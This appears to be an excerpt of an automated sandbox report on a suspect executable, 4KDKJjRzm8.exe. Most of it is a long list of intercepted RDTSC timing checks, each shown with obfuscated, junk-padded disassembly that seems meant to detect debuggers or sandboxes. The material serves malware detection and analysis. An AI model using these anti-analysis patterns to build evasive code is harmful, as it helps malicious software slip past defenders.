                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F054B second address: 52F05DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3DD280BC1h 0x00000009 xor ecx, 4B9D4756h 0x0000000f jmp 00007FB3DD280BC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB3DD280BC3h 0x00000022 xor cx, 988Eh 0x00000027 jmp 00007FB3DD280BC9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FB3DD280BC0h 0x00000033 jmp 00007FB3DD280BC5h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F05DA second address: 52F066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB3DD3D95F7h 0x00000010 pushfd 0x00000011 jmp 00007FB3DD3D95F8h 0x00000016 add cx, 92F8h 0x0000001b jmp 00007FB3DD3D95EBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov si, D341h 0x00000029 push eax 0x0000002a pop edx 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007FB3DD3D95EAh 0x00000032 or eax, 274BED58h 0x00000038 jmp 00007FB3DD3D95EBh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov bx, DA46h 0x00000048 mov edx, 6A8454D2h 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F066A second address: 52F0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0670 second address: 52F0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0674 second address: 52F06AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB3DD280BC3h 0x00000012 jmp 00007FB3DD280BC3h 0x00000017 popfd 0x00000018 mov di, si 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F06AC second address: 52F06B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F06B2 second address: 52F06B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F06B6 second address: 52F06BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F06BA second address: 52F06E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB3DD280BBAh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FB3DD280BC0h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F06E5 second address: 52F0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0702 second address: 52F071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F071E second address: 52F0753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007FB3DD3D95EDh 0x0000000c xor ax, 37D6h 0x00000011 jmp 00007FB3DD3D95F1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0753 second address: 52F0757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0757 second address: 52F076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F076A second address: 52F0782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD280BC4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0782 second address: 52F0786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0786 second address: 52F07E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB3DD280BC8h 0x00000014 jmp 00007FB3DD280BC5h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007FB3DD280BC0h 0x00000020 adc eax, 25914518h 0x00000026 jmp 00007FB3DD280BBBh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F07E7 second address: 52F0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 423Ah 0x00000007 jmp 00007FB3DD3D95EBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jmp 00007FB3DD3D95F6h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FB3DD3D95ECh 0x0000001f sbb ax, C9D8h 0x00000024 jmp 00007FB3DD3D95EBh 0x00000029 popfd 0x0000002a mov bx, si 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F08C4 second address: 52F08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F08C8 second address: 52F08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F08CE second address: 52F08DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD280BBDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0901 second address: 52F0905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0905 second address: 52F090B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F090B second address: 52F0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0911 second address: 52F092B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3DD280BBFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F092B second address: 52E021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3DD3D95EFh 0x00000009 adc cx, BCDEh 0x0000000e jmp 00007FB3DD3D95F9h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB3DD3D95F8h 0x00000022 sbb ch, 00000008h 0x00000025 jmp 00007FB3DD3D95EBh 0x0000002a popfd 0x0000002b jmp 00007FB3DD3D95F8h 0x00000030 popad 0x00000031 retn 0004h 0x00000034 nop 0x00000035 sub esp, 04h 0x00000038 xor ebx, ebx 0x0000003a cmp eax, 00000000h 0x0000003d je 00007FB3DD3D974Ah 0x00000043 mov dword ptr [esp], 0000000Dh 0x0000004a call 00007FB3E1D05991h 0x0000004f mov edi, edi 0x00000051 pushad 0x00000052 popad 0x00000053 xchg eax, ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E021B second address: 52E021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E021F second address: 52E0225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0225 second address: 52E0236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD280BBDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0236 second address: 52E023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E023A second address: 52E0268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB3DD280BBAh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FB3DD280BBCh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ch, dl 0x0000001d mov si, 1B35h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0268 second address: 52E026D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E026D second address: 52E02A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB3DD280BC0h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E02A2 second address: 52E02B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E02B1 second address: 52E02B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E02B7 second address: 52E02C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E02C6 second address: 52E02CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E02CC second address: 52E0323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 0C1Dh 0x00000007 pushfd 0x00000008 jmp 00007FB3DD3D95EAh 0x0000000d sbb ah, 00000078h 0x00000010 jmp 00007FB3DD3D95EBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e call 00007FB3DD3D95F2h 0x00000023 pop esi 0x00000024 push edx 0x00000025 pop ecx 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FB3DD3D95F2h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0323 second address: 52E0332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0332 second address: 52E035E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3DD3D95ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E03AD second address: 52E03B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E03B3 second address: 52E044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007FB3DD3D95F1h 0x00000010 inc ebx 0x00000011 jmp 00007FB3DD3D95EEh 0x00000016 test al, al 0x00000018 jmp 00007FB3DD3D95F0h 0x0000001d je 00007FB3DD3D97D9h 0x00000023 pushad 0x00000024 mov di, ax 0x00000027 mov ch, A5h 0x00000029 popad 0x0000002a lea ecx, dword ptr [ebp-14h] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FB3DD3D95EBh 0x00000034 add cx, 523Eh 0x00000039 jmp 00007FB3DD3D95F9h 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 call 00007FB3DD3D95EEh 0x00000046 pop ecx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0496 second address: 52E049B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E049B second address: 52E04B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E04E5 second address: 52E04E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E04E9 second address: 52E04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E04EF second address: 52E04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E04F5 second address: 52E0505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0505 second address: 52E0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0509 second address: 52E050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E050F second address: 52E057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FB3DD280BC9h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FB44D38EB10h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB3DD280BBDh 0x0000001c sbb ch, FFFFFFB6h 0x0000001f jmp 00007FB3DD280BC1h 0x00000024 popfd 0x00000025 mov edi, eax 0x00000027 popad 0x00000028 js 00007FB3DD280C49h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB3DD280BC4h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E057D second address: 52E0581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0581 second address: 52E0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0587 second address: 52E05C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3DD3D95ECh 0x00000009 sbb cx, 0A38h 0x0000000e jmp 00007FB3DD3D95EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 cmp dword ptr [ebp-14h], edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bl, cl 0x0000001f jmp 00007FB3DD3D95F3h 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E05C7 second address: 52E0609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FB44D38EA6Dh 0x0000000f jmp 00007FB3DD280BBEh 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB3DD280BBAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0609 second address: 52E060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E060F second address: 52E0650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d push esi 0x0000000e mov dx, 56CCh 0x00000012 pop edx 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 jmp 00007FB3DD280BC0h 0x0000001a push eax 0x0000001b jmp 00007FB3DD280BBBh 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0650 second address: 52E0654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0654 second address: 52E065A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E065A second address: 52E06D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB3DD3D95EEh 0x00000011 adc al, 00000078h 0x00000014 jmp 00007FB3DD3D95EBh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007FB3DD3D95F8h 0x00000020 jmp 00007FB3DD3D95F5h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 mov cx, dx 0x0000002c movsx edi, cx 0x0000002f popad 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB3DD3D95F1h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E06D5 second address: 52E06DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0755 second address: 52E0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0759 second address: 52E0771 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 mov eax, 4BCDBC91h 0x0000000c pop eax 0x0000000d popad 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 0Ch 0x00000015 mov dh, FAh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0771 second address: 52E0777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0777 second address: 52E000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB44D38EA8Ch 0x0000000e xor eax, eax 0x00000010 jmp 00007FB3DD25A2EAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007FB3DD280CF5h 0x0000002d call 00007FB3E1BACBFCh 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FB3DD280BBAh 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E000E second address: 52E0070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB3DD3D95F6h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FB3DD3D95F7h 0x00000017 mov ah, C4h 0x00000019 popad 0x0000001a jmp 00007FB3DD3D95F5h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov eax, edx 0x00000026 push ebx 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0070 second address: 52E00AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 jmp 00007FB3DD280BBAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FB3DD280BC0h 0x00000014 xchg eax, ecx 0x00000015 jmp 00007FB3DD280BC0h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov di, ax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E00AF second address: 52E0106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3DD3D95F5h 0x00000008 mov esi, 7B2EC577h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB3DD3D95EFh 0x0000001a sbb ecx, 0EEDABFEh 0x00000020 jmp 00007FB3DD3D95F9h 0x00000025 popfd 0x00000026 mov edx, ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0106 second address: 52E010C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E010C second address: 52E0169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], 55534552h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FB3DD3D95EBh 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007FB3DD3D95F9h 0x00000021 and cx, 2A46h 0x00000026 jmp 00007FB3DD3D95F1h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
